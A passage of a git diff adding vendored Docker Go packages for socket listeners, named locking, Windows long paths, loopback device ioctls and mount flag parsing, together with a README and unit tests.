a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go new file mode 100644 index 0000000000..ff833e3741 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go @@ -0,0 +1,31 @@ +package listeners + +import ( + "crypto/tls" + "fmt" + "net" + + "github.com/docker/go-connections/sockets" +) + +// Init creates new listeners for the server. +func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) (ls []net.Listener, err error) { + switch proto { + case "tcp": + l, err := sockets.NewTCPSocket(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, l) + case "unix": + l, err := sockets.NewUnixSocket(addr, socketGroup) + if err != nil { + return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) + } + ls = append(ls, l) + default: + return nil, fmt.Errorf("Invalid protocol format: %q", proto) + } + + return +} diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go new file mode 100644 index 0000000000..1bcae7aa3e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go @@ -0,0 +1,94 @@ +// +build !windows,!solaris + +package listeners + +import ( + "crypto/tls" + "fmt" + "net" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/coreos/go-systemd/activation" + "github.com/docker/go-connections/sockets" +) + +// Init creates new listeners for the server. +// TODO: Clean up the fact that socketGroup and tlsConfig aren't always used. +func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listener, error) { + ls := []net.Listener{} + + switch proto { + case "fd": + fds, err := listenFD(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, fds...) + case "tcp": + l, err := sockets.NewTCPSocket(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, l) + case "unix": + l, err := sockets.NewUnixSocket(addr, socketGroup) + if err != nil { + return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) + } + ls = append(ls, l) + default: + return nil, fmt.Errorf("invalid protocol format: %q", proto) + } + + return ls, nil +} + +// listenFD returns the specified socket activated files as a slice of +// net.Listeners or all of the activated files if "*" is given. +func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { + var ( + err error + listeners []net.Listener + ) + // socket activation + if tlsConfig != nil { + listeners, err = activation.TLSListeners(false, tlsConfig) + } else { + listeners, err = activation.Listeners(false) + } + if err != nil { + return nil, err + } + + if len(listeners) == 0 { + return nil, fmt.Errorf("no sockets found via socket activation: make sure the service was started by systemd") + } + + // default to all fds just like unix:// and tcp:// + if addr == "" || addr == "*" { + return listeners, nil + } + + fdNum, err := strconv.Atoi(addr) + if err != nil { + return nil, fmt.Errorf("failed to parse systemd fd address: should be a number: %v", addr) + } + fdOffset := fdNum - 3 + if len(listeners) < int(fdOffset)+1 { + return nil, fmt.Errorf("too few socket activated files passed in by systemd") + } + if listeners[fdOffset] == nil { + return nil, fmt.Errorf("failed to listen on systemd activated file: fd %d", fdOffset+3) + } + for i, ls := range listeners { + if i == fdOffset || ls == nil { + continue + } + if err := ls.Close(); err != nil { + // TODO: We shouldn't log inside a library. Remove this or error out. + logrus.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err) + } + } + return []net.Listener{listeners[fdOffset]}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go new file mode 100644 index 0000000000..5b5a470fc6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go @@ -0,0 +1,54 @@ +package listeners + +import ( + "crypto/tls" + "fmt" + "net" + "strings" + + "github.com/Microsoft/go-winio" + "github.com/docker/go-connections/sockets" +) + +// Init creates new listeners for the server. +func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listener, error) { + ls := []net.Listener{} + + switch proto { + case "tcp": + l, err := sockets.NewTCPSocket(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, l) + + case "npipe": + // allow Administrators and SYSTEM, plus whatever additional users or groups were specified + sddl := "D:P(A;;GA;;;BA)(A;;GA;;;SY)" + if socketGroup != "" { + for _, g := range strings.Split(socketGroup, ",") { + sid, err := winio.LookupSidByName(g) + if err != nil { + return nil, err + } + sddl += fmt.Sprintf("(A;;GRGW;;;%s)", sid) + } + } + c := winio.PipeConfig{ + SecurityDescriptor: sddl, + MessageMode: true, // Use message mode so that CloseWrite() is supported + InputBufferSize: 65536, // Use 64KB buffers to improve performance + OutputBufferSize: 65536, + } + l, err := winio.ListenPipe(addr, &c) + if err != nil { + return nil, err + } + ls = append(ls, l) + + default: + return nil, fmt.Errorf("invalid protocol format: windows only supports tcp and npipe") + } + + return ls, nil +} diff --git a/vendor/github.com/docker/docker/pkg/locker/README.md b/vendor/github.com/docker/docker/pkg/locker/README.md new file mode 100644 index 0000000000..e84a815cc5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/locker/README.md @@ -0,0 +1,65 @@ +Locker +===== + +locker provides a mechanism for creating finer-grained locking to help +free up more global locks to handle other tasks. + +The implementation looks close to a sync.Mutex, however the user must provide a +reference to use to refer to the underlying lock when locking and unlocking, +and unlock may generate an error. + +If a lock with a given name does not exist when `Lock` is called, one is +created. +Lock references are automatically cleaned up on `Unlock` if nothing else is +waiting for the lock. + + +## Usage + +```go +package important + +import ( + "sync" + "time" + + "github.com/docker/docker/pkg/locker" +) + +type important struct { + locks *locker.Locker + data map[string]interface{} + mu sync.Mutex +} + +func (i *important) Get(name string) interface{} { + i.locks.Lock(name) + defer i.locks.Unlock(name) + return data[name] +} + +func (i *important) Create(name string, data interface{}) { + i.locks.Lock(name) + defer i.locks.Unlock(name) + + i.createImportant(data) + + s.mu.Lock() + i.data[name] = data + s.mu.Unlock() +} + +func (i *important) createImportant(data interface{}) { + time.Sleep(10 * time.Second) +} +``` + +For functions dealing with a given name, always lock at the beginning of the +function (or before doing anything with the underlying state), this ensures any +other function that is dealing with the same name will block. + +When needing to modify the underlying data, use the global lock to ensure nothing +else is modfying it at the same time. +Since name lock is already in place, no reads will occur while the modification +is being performed. + diff --git a/vendor/github.com/docker/docker/pkg/locker/locker.go b/vendor/github.com/docker/docker/pkg/locker/locker.go new file mode 100644 index 0000000000..0b22ddfab8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/locker/locker.go @@ -0,0 +1,112 @@ +/* +Package locker provides a mechanism for creating finer-grained locking to help +free up more global locks to handle other tasks. + +The implementation looks close to a sync.Mutex, however the user must provide a +reference to use to refer to the underlying lock when locking and unlocking, +and unlock may generate an error. + +If a lock with a given name does not exist when `Lock` is called, one is +created. +Lock references are automatically cleaned up on `Unlock` if nothing else is +waiting for the lock. +*/ +package locker + +import ( + "errors" + "sync" + "sync/atomic" +) + +// ErrNoSuchLock is returned when the requested lock does not exist +var ErrNoSuchLock = errors.New("no such lock") + +// Locker provides a locking mechanism based on the passed in reference name +type Locker struct { + mu sync.Mutex + locks map[string]*lockCtr +} + +// lockCtr is used by Locker to represent a lock with a given name. +type lockCtr struct { + mu sync.Mutex + // waiters is the number of waiters waiting to acquire the lock + // this is int32 instead of uint32 so we can add `-1` in `dec()` + waiters int32 +} + +// inc increments the number of waiters waiting for the lock +func (l *lockCtr) inc() { + atomic.AddInt32(&l.waiters, 1) +} + +// dec decrements the number of waiters waiting on the lock +func (l *lockCtr) dec() { + atomic.AddInt32(&l.waiters, -1) +} + +// count gets the current number of waiters +func (l *lockCtr) count() int32 { + return atomic.LoadInt32(&l.waiters) +} + +// Lock locks the mutex +func (l *lockCtr) Lock() { + l.mu.Lock() +} + +// Unlock unlocks the mutex +func (l *lockCtr) Unlock() { + l.mu.Unlock() +} + +// New creates a new Locker +func New() *Locker { + return &Locker{ + locks: make(map[string]*lockCtr), + } +} + +// Lock locks a mutex with the given name. If it doesn't exist, one is created +func (l *Locker) Lock(name string) { + l.mu.Lock() + if l.locks == nil { + l.locks = make(map[string]*lockCtr) + } + + nameLock, exists := l.locks[name] + if !exists { + nameLock = &lockCtr{} + l.locks[name] = nameLock + } + + // increment the nameLock waiters while inside the main mutex + // this makes sure that the lock isn't deleted if `Lock` and `Unlock` are called concurrently + nameLock.inc() + l.mu.Unlock() + + // Lock the nameLock outside the main mutex so we don't block other operations + // once locked then we can decrement the number of waiters for this lock + nameLock.Lock() + nameLock.dec() +} + +// Unlock unlocks the mutex with the given name +// If the given lock is not being waited on by any other callers, it is deleted +func (l *Locker) Unlock(name string) error { + l.mu.Lock() + nameLock, exists := l.locks[name] + if !exists { + l.mu.Unlock() + return ErrNoSuchLock + } + + if nameLock.count() == 0 { + delete(l.locks, name) + } + nameLock.Unlock() + + l.mu.Unlock() + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/locker/locker_test.go b/vendor/github.com/docker/docker/pkg/locker/locker_test.go new file mode 100644 index 0000000000..5a297dd47b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/locker/locker_test.go @@ -0,0 +1,124 @@ +package locker + +import ( + "sync" + "testing" + "time" +) + +func TestLockCounter(t *testing.T) { + l := &lockCtr{} + l.inc() + + if l.waiters != 1 { + t.Fatal("counter inc failed") + } + + l.dec() + if l.waiters != 0 { + t.Fatal("counter dec failed") + } +} + +func TestLockerLock(t *testing.T) { + l := New() + l.Lock("test") + ctr := l.locks["test"] + + if ctr.count() != 0 { + t.Fatalf("expected waiters to be 0, got :%d", ctr.waiters) + } + + chDone := make(chan struct{}) + go func() { + l.Lock("test") + close(chDone) + }() + + chWaiting := make(chan struct{}) + go func() { + for range time.Tick(1 * time.Millisecond) { + if ctr.count() == 1 { + close(chWaiting) + break + } + } + }() + + select { + case <-chWaiting: + case <-time.After(3 * time.Second): + t.Fatal("timed out waiting for lock waiters to be incremented") + } + + select { + case <-chDone: + t.Fatal("lock should not have returned while it was still held") + default: + } + + if err := l.Unlock("test"); err != nil { + t.Fatal(err) + } + + select { + case <-chDone: + case <-time.After(3 * time.Second): + t.Fatalf("lock should have completed") + } + + if ctr.count() != 0 { + t.Fatalf("expected waiters to be 0, got: %d", ctr.count()) + } +} + +func TestLockerUnlock(t *testing.T) { + l := New() + + l.Lock("test") + l.Unlock("test") + + chDone := make(chan struct{}) + go func() { + l.Lock("test") + close(chDone) + }() + + select { + case <-chDone: + case <-time.After(3 * time.Second): + t.Fatalf("lock should not be blocked") + } +} + +func TestLockerConcurrency(t *testing.T) { + l := New() + + var wg sync.WaitGroup + for i := 0; i <= 10000; i++ { + wg.Add(1) + go func() { + l.Lock("test") + // if there is a concurrency issue, will very likely panic here + l.Unlock("test") + wg.Done() + }() + } + + chDone := make(chan struct{}) + go func() { + wg.Wait() + close(chDone) + }() + + select { + case <-chDone: + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for locks to complete") + } + + // Since everything has unlocked this should not exist anymore + if ctr, exists := l.locks["test"]; exists { + t.Fatalf("lock should not exist: %v", ctr) + } +} diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath.go b/vendor/github.com/docker/docker/pkg/longpath/longpath.go new file mode 100644 index 0000000000..9b15bfff4c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath.go @@ -0,0 +1,26 @@ +// longpath introduces some constants and helper functions for handling long paths +// in Windows, which are expected to be prepended with `\\?\` and followed by either +// a drive letter, a UNC server\share, or a volume identifier. + +package longpath + +import ( + "strings" +) + +// Prefix is the longpath prefix for Windows file paths. +const Prefix = `\\?\` + +// AddPrefix will add the Windows long path prefix to the path provided if +// it does not already have it. +func AddPrefix(path string) string { + if !strings.HasPrefix(path, Prefix) { + if strings.HasPrefix(path, `\\`) { + // This is a UNC path, so we need to add 'UNC' to the path as well. + path = Prefix + `UNC` + path[1:] + } else { + path = Prefix + path + } + } + return path +} diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go new file mode 100644 index 0000000000..01865eff09 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go @@ -0,0 +1,22 @@ +package longpath + +import ( + "strings" + "testing" +) + +func TestStandardLongPath(t *testing.T) { + c := `C:\simple\path` + longC := AddPrefix(c) + if !strings.EqualFold(longC, `\\?\C:\simple\path`) { + t.Errorf("Wrong long path returned. Original = %s ; Long = %s", c, longC) + } +} + +func TestUNCLongPath(t *testing.T) { + c := `\\server\share\path` + longC := AddPrefix(c) + if !strings.EqualFold(longC, `\\?\UNC\server\share\path`) { + t.Errorf("Wrong UNC long path returned. Original = %s ; Long = %s", c, longC) + } +} diff --git a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go new file mode 100644 index 0000000000..971f45eb48 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go @@ -0,0 +1,137 @@ +// +build linux + +package loopback + +import ( + "errors" + "fmt" + "os" + "syscall" + + "github.com/Sirupsen/logrus" +) + +// Loopback related errors +var ( + ErrAttachLoopbackDevice = errors.New("loopback attach failed") + ErrGetLoopbackBackingFile = errors.New("Unable to get loopback backing file") + ErrSetCapacity = errors.New("Unable set loopback capacity") +) + +func stringToLoopName(src string) [LoNameSize]uint8 { + var dst [LoNameSize]uint8 + copy(dst[:], src[:]) + return dst +} + +func getNextFreeLoopbackIndex() (int, error) { + f, err := os.OpenFile("/dev/loop-control", os.O_RDONLY, 0644) + if err != nil { + return 0, err + } + defer f.Close() + + index, err := ioctlLoopCtlGetFree(f.Fd()) + if index < 0 { + index = 0 + } + return index, err +} + +func openNextAvailableLoopback(index int, sparseFile *os.File) (loopFile *os.File, err error) { + // Start looking for a free /dev/loop + for { + target := fmt.Sprintf("/dev/loop%d", index) + index++ + + fi, err := os.Stat(target) + if err != nil { + if os.IsNotExist(err) { + logrus.Error("There are no more loopback devices available.") + } + return nil, ErrAttachLoopbackDevice + } + + if fi.Mode()&os.ModeDevice != os.ModeDevice { + logrus.Errorf("Loopback device %s is not a block device.", target) + continue + } + + // OpenFile adds O_CLOEXEC + loopFile, err = os.OpenFile(target, os.O_RDWR, 0644) + if err != nil { + logrus.Errorf("Error opening loopback device: %s", err) + return nil, ErrAttachLoopbackDevice + } + + // Try to attach to the loop file + if err := ioctlLoopSetFd(loopFile.Fd(), sparseFile.Fd()); err != nil { + loopFile.Close() + + // If the error is EBUSY, then try the next loopback + if err != syscall.EBUSY { + logrus.Errorf("Cannot set up loopback device %s: %s", target, err) + return nil, ErrAttachLoopbackDevice + } + + // Otherwise, we keep going with the loop + continue + } + // In case of success, we finished. Break the loop. + break + } + + // This can't happen, but let's be sure + if loopFile == nil { + logrus.Errorf("Unreachable code reached! Error attaching %s to a loopback device.", sparseFile.Name()) + return nil, ErrAttachLoopbackDevice + } + + return loopFile, nil +} + +// AttachLoopDevice attaches the given sparse file to the next +// available loopback device. It returns an opened *os.File. +func AttachLoopDevice(sparseName string) (loop *os.File, err error) { + + // Try to retrieve the next available loopback device via syscall. + // If it fails, we discard error and start looping for a + // loopback from index 0. + startIndex, err := getNextFreeLoopbackIndex() + if err != nil { + logrus.Debugf("Error retrieving the next available loopback: %s", err) + } + + // OpenFile adds O_CLOEXEC + sparseFile, err := os.OpenFile(sparseName, os.O_RDWR, 0644) + if err != nil { + logrus.Errorf("Error opening sparse file %s: %s", sparseName, err) + return nil, ErrAttachLoopbackDevice + } + defer sparseFile.Close() + + loopFile, err := openNextAvailableLoopback(startIndex, sparseFile) + if err != nil { + return nil, err + } + + // Set the status of the loopback device + loopInfo := &loopInfo64{ + loFileName: stringToLoopName(loopFile.Name()), + loOffset: 0, + loFlags: LoFlagsAutoClear, + } + + if err := ioctlLoopSetStatus64(loopFile.Fd(), loopInfo); err != nil { + logrus.Errorf("Cannot set up loopback device info: %s", err) + + // If the call failed, then free the loopback device + if err := ioctlLoopClrFd(loopFile.Fd()); err != nil { + logrus.Error("Error while cleaning up the loopback device") + } + loopFile.Close() + return nil, ErrAttachLoopbackDevice + } + + return loopFile, nil +} diff --git a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go new file mode 100644 index 0000000000..0714eb5f87 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go @@ -0,0 +1,53 @@ +// +build linux + +package loopback + +import ( + "syscall" + "unsafe" +) + +func ioctlLoopCtlGetFree(fd uintptr) (int, error) { + index, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, LoopCtlGetFree, 0) + if err != 0 { + return 0, err + } + return int(index), nil +} + +func ioctlLoopSetFd(loopFd, sparseFd uintptr) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetFd, sparseFd); err != 0 { + return err + } + return nil +} + +func ioctlLoopSetStatus64(loopFd uintptr, loopInfo *loopInfo64) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { + return err + } + return nil +} + +func ioctlLoopClrFd(loopFd uintptr) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 { + return err + } + return nil +} + +func ioctlLoopGetStatus64(loopFd uintptr) (*loopInfo64, error) { + loopInfo := &loopInfo64{} + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { + return nil, err + } + return loopInfo, nil +} + +func ioctlLoopSetCapacity(loopFd uintptr, value int) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetCapacity, uintptr(value)); err != 0 { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go new file mode 100644 index 0000000000..e1100ce156 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go @@ -0,0 +1,52 @@ +// +build linux + +package loopback + +/* +#include // FIXME: present only for defines, maybe we can remove it? + +#ifndef LOOP_CTL_GET_FREE + #define LOOP_CTL_GET_FREE 0x4C82 +#endif + +#ifndef LO_FLAGS_PARTSCAN + #define LO_FLAGS_PARTSCAN 8 +#endif + +*/ +import "C" + +type loopInfo64 struct { + loDevice uint64 /* ioctl r/o */ + loInode uint64 /* ioctl r/o */ + loRdevice uint64 /* ioctl r/o */ + loOffset uint64 + loSizelimit uint64 /* bytes, 0 == max available */ + loNumber uint32 /* ioctl r/o */ + loEncryptType uint32 + loEncryptKeySize uint32 /* ioctl w/o */ + loFlags uint32 /* ioctl r/o */ + loFileName [LoNameSize]uint8 + loCryptName [LoNameSize]uint8 + loEncryptKey [LoKeySize]uint8 /* ioctl w/o */ + loInit [2]uint64 +} + +// IOCTL consts +const ( + LoopSetFd = C.LOOP_SET_FD + LoopCtlGetFree = C.LOOP_CTL_GET_FREE + LoopGetStatus64 = C.LOOP_GET_STATUS64 + LoopSetStatus64 = C.LOOP_SET_STATUS64 + LoopClrFd = C.LOOP_CLR_FD + LoopSetCapacity = C.LOOP_SET_CAPACITY +) + +// LOOP consts. +const ( + LoFlagsAutoClear = C.LO_FLAGS_AUTOCLEAR + LoFlagsReadOnly = C.LO_FLAGS_READ_ONLY + LoFlagsPartScan = C.LO_FLAGS_PARTSCAN + LoKeySize = C.LO_KEY_SIZE + LoNameSize = C.LO_NAME_SIZE +) diff --git a/vendor/github.com/docker/docker/pkg/loopback/loopback.go b/vendor/github.com/docker/docker/pkg/loopback/loopback.go new file mode 100644 index 0000000000..bc0479284c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/loopback.go @@ -0,0 +1,63 @@ +// +build linux + +package loopback + +import ( + "fmt" + "os" + "syscall" + + "github.com/Sirupsen/logrus" +) + +func getLoopbackBackingFile(file *os.File) (uint64, uint64, error) { + loopInfo, err := ioctlLoopGetStatus64(file.Fd()) + if err != nil { + logrus.Errorf("Error get loopback backing file: %s", err) + return 0, 0, ErrGetLoopbackBackingFile + } + return loopInfo.loDevice, loopInfo.loInode, nil +} + +// SetCapacity reloads the size for the loopback device. +func SetCapacity(file *os.File) error { + if err := ioctlLoopSetCapacity(file.Fd(), 0); err != nil { + logrus.Errorf("Error loopbackSetCapacity: %s", err) + return ErrSetCapacity + } + return nil +} + +// FindLoopDeviceFor returns a loopback device file for the specified file which +// is backing file of a loop back device. +func FindLoopDeviceFor(file *os.File) *os.File { + stat, err := file.Stat() + if err != nil { + return nil + } + targetInode := stat.Sys().(*syscall.Stat_t).Ino + targetDevice := stat.Sys().(*syscall.Stat_t).Dev + + for i := 0; true; i++ { + path := fmt.Sprintf("/dev/loop%d", i) + + file, err := os.OpenFile(path, os.O_RDWR, 0) + if err != nil { + if os.IsNotExist(err) { + return nil + } + + // Ignore all errors until the first not-exist + // we want to continue looking for the file + continue + } + + dev, inode, err := getLoopbackBackingFile(file) + if err == nil && dev == targetDevice && inode == targetInode { + return file + } + file.Close() + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/flags.go b/vendor/github.com/docker/docker/pkg/mount/flags.go new file mode 100644 index 0000000000..607dbed43a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags.go @@ -0,0 +1,149 @@ +package mount + +import ( + "fmt" + "strings" +) + +var flags = map[string]struct { + clear bool + flag int +}{ + "defaults": {false, 0}, + "ro": {false, RDONLY}, + "rw": {true, RDONLY}, + "suid": {true, NOSUID}, + "nosuid": {false, NOSUID}, + "dev": {true, NODEV}, + "nodev": {false, NODEV}, + "exec": {true, NOEXEC}, + "noexec": {false, NOEXEC}, + "sync": {false, SYNCHRONOUS}, + "async": {true, SYNCHRONOUS}, + "dirsync": {false, DIRSYNC}, + "remount": {false, REMOUNT}, + "mand": {false, MANDLOCK}, + "nomand": {true, MANDLOCK}, + "atime": {true, NOATIME}, + "noatime": {false, NOATIME}, + "diratime": {true, NODIRATIME}, + "nodiratime": {false, NODIRATIME}, + "bind": {false, BIND}, + "rbind": {false, RBIND}, + "unbindable": {false, UNBINDABLE}, + "runbindable": {false, RUNBINDABLE}, + "private": {false, PRIVATE}, + "rprivate": {false, RPRIVATE}, + "shared": {false, SHARED}, + "rshared": {false, RSHARED}, + "slave": {false, SLAVE}, + "rslave": {false, RSLAVE}, + "relatime": {false, RELATIME}, + "norelatime": {true, RELATIME}, + "strictatime": {false, STRICTATIME}, + "nostrictatime": {true, STRICTATIME}, +} + +var validFlags = map[string]bool{ + "": true, + "size": true, + "mode": true, + "uid": true, + "gid": true, + "nr_inodes": true, + "nr_blocks": true, + "mpol": true, +} + +var propagationFlags = map[string]bool{ + "bind": true, + "rbind": true, + "unbindable": true, + "runbindable": true, + "private": true, + "rprivate": true, + "shared": true, + "rshared": true, + "slave": true, + "rslave": true, +} + +// MergeTmpfsOptions merge mount options to make sure there is no duplicate. +func MergeTmpfsOptions(options []string) ([]string, error) { + // We use collisions maps to remove duplicates. + // For flag, the key is the flag value (the key for propagation flag is -1) + // For data=value, the key is the data + flagCollisions := map[int]bool{} + dataCollisions := map[string]bool{} + + var newOptions []string + // We process in reverse order + for i := len(options) - 1; i >= 0; i-- { + option := options[i] + if option == "defaults" { + continue + } + if f, ok := flags[option]; ok && f.flag != 0 { + // There is only one propagation mode + key := f.flag + if propagationFlags[option] { + key = -1 + } + // Check to see if there is collision for flag + if !flagCollisions[key] { + // We prepend the option and add to collision map + newOptions = append([]string{option}, newOptions...) + flagCollisions[key] = true + } + continue + } + opt := strings.SplitN(option, "=", 2) + if len(opt) != 2 || !validFlags[opt[0]] { + return nil, fmt.Errorf("Invalid tmpfs option %q", opt) + } + if !dataCollisions[opt[0]] { + // We prepend the option and add to collision map + newOptions = append([]string{option}, newOptions...) + dataCollisions[opt[0]] = true + } + } + + return newOptions, nil +} + +// Parse fstab type mount options into mount() flags +// and device specific data +func parseOptions(options string) (int, string) { + var ( + flag int + data []string + ) + + for _, o := range strings.Split(options, ",") { + // If the option does not exist in the flags table or the flag + // is not supported on the platform, + // then it is a data value for a specific fs type + if f, exists := flags[o]; exists && f.flag != 0 { + if f.clear { + flag &= ^f.flag + } else { + flag |= f.flag + } + } else { + data = append(data, o) + } + } + return flag, strings.Join(data, ",") +} + +// ParseTmpfsOptions parse fstab type mount options into flags and data +func ParseTmpfsOptions(options string) (int, string, error) { + flags, data := parseOptions(options) + for _, o := range strings.Split(data, ",") { + opt := strings.SplitN(o, "=", 2) + if !validFlags[opt[0]] { + return 0, "", fmt.Errorf("Invalid tmpfs option %q", opt) + } + } + return flags, data, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go new file mode 100644 index 0000000000..f166cb2f77 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go @@ -0,0 +1,48 @@ +// +build freebsd,cgo + +package mount + +/* +#include +*/ +import "C" + +const ( + // RDONLY will mount the filesystem as read-only. + RDONLY = C.MNT_RDONLY + + // NOSUID will not allow set-user-identifier or set-group-identifier bits to + // take effect. + NOSUID = C.MNT_NOSUID + + // NOEXEC will not allow execution of any binaries on the mounted file system. + NOEXEC = C.MNT_NOEXEC + + // SYNCHRONOUS will allow any I/O to the file system to be done synchronously. + SYNCHRONOUS = C.MNT_SYNCHRONOUS + + // NOATIME will not update the file access time when reading from a file. + NOATIME = C.MNT_NOATIME +) + +// These flags are unsupported. +const ( + BIND = 0 + DIRSYNC = 0 + MANDLOCK = 0 + NODEV = 0 + NODIRATIME = 0 + UNBINDABLE = 0 + RUNBINDABLE = 0 + PRIVATE = 0 + RPRIVATE = 0 + SHARED = 0 + RSHARED = 0 + SLAVE = 0 + RSLAVE = 0 + RBIND = 0 + RELATIVE = 0 + RELATIME = 0 + REMOUNT = 0 + STRICTATIME = 0 +) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go new file mode 100644 index 0000000000..dc696dce90 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go @@ -0,0 +1,85 @@ +package mount + +import ( + "syscall" +) + +const ( + // RDONLY will mount the file system read-only. + RDONLY = syscall.MS_RDONLY + + // NOSUID will not allow set-user-identifier or set-group-identifier bits to + // take effect. + NOSUID = syscall.MS_NOSUID + + // NODEV will not interpret character or block special devices on the file + // system. + NODEV = syscall.MS_NODEV + + // NOEXEC will not allow execution of any binaries on the mounted file system. + NOEXEC = syscall.MS_NOEXEC + + // SYNCHRONOUS will allow I/O to the file system to be done synchronously. + SYNCHRONOUS = syscall.MS_SYNCHRONOUS + + // DIRSYNC will force all directory updates within the file system to be done + // synchronously. This affects the following system calls: create, link, + // unlink, symlink, mkdir, rmdir, mknod and rename. + DIRSYNC = syscall.MS_DIRSYNC + + // REMOUNT will attempt to remount an already-mounted file system. This is + // commonly used to change the mount flags for a file system, especially to + // make a readonly file system writeable. It does not change device or mount + // point. + REMOUNT = syscall.MS_REMOUNT + + // MANDLOCK will force mandatory locks on a filesystem. + MANDLOCK = syscall.MS_MANDLOCK + + // NOATIME will not update the file access time when reading from a file. + NOATIME = syscall.MS_NOATIME + + // NODIRATIME will not update the directory access time. + NODIRATIME = syscall.MS_NODIRATIME + + // BIND remounts a subtree somewhere else. + BIND = syscall.MS_BIND + + // RBIND remounts a subtree and all possible submounts somewhere else. + RBIND = syscall.MS_BIND | syscall.MS_REC + + // UNBINDABLE creates a mount which cannot be cloned through a bind operation. + UNBINDABLE = syscall.MS_UNBINDABLE + + // RUNBINDABLE marks the entire mount tree as UNBINDABLE. + RUNBINDABLE = syscall.MS_UNBINDABLE | syscall.MS_REC + + // PRIVATE creates a mount which carries no propagation abilities. + PRIVATE = syscall.MS_PRIVATE + + // RPRIVATE marks the entire mount tree as PRIVATE. + RPRIVATE = syscall.MS_PRIVATE | syscall.MS_REC + + // SLAVE creates a mount which receives propagation from its master, but not + // vice versa. + SLAVE = syscall.MS_SLAVE + + // RSLAVE marks the entire mount tree as SLAVE. + RSLAVE = syscall.MS_SLAVE | syscall.MS_REC + + // SHARED creates a mount which provides the ability to create mirrors of + // that mount such that mounts and unmounts within any of the mirrors + // propagate to the other mirrors. + SHARED = syscall.MS_SHARED + + // RSHARED marks the entire mount tree as SHARED. + RSHARED = syscall.MS_SHARED | syscall.MS_REC + + // RELATIME updates inode access times relative to modify or change time. + RELATIME = syscall.MS_RELATIME + + // STRICTATIME allows to explicitly request full atime updates. This makes + // it possible for the kernel to default to relatime or noatime but still + // allow userspace to override it. + STRICTATIME = syscall.MS_STRICTATIME +) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go new file mode 100644 index 0000000000..5564f7b3cd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go @@ -0,0 +1,30 @@ +// +build !linux,!freebsd freebsd,!cgo solaris,!cgo + +package mount + +// These flags are unsupported. +const ( + BIND = 0 + DIRSYNC = 0 + MANDLOCK = 0 + NOATIME = 0 + NODEV = 0 + NODIRATIME = 0 + NOEXEC = 0 + NOSUID = 0 + UNBINDABLE = 0 + RUNBINDABLE = 0 + PRIVATE = 0 + RPRIVATE = 0 + SHARED = 0 + RSHARED = 0 + SLAVE = 0 + RSLAVE = 0 + RBIND = 0 + RELATIME = 0 + RELATIVE = 0 + REMOUNT = 0 + STRICTATIME = 0 + SYNCHRONOUS = 0 + RDONLY = 0 +) diff --git a/vendor/github.com/docker/docker/pkg/mount/mount.go b/vendor/github.com/docker/docker/pkg/mount/mount.go new file 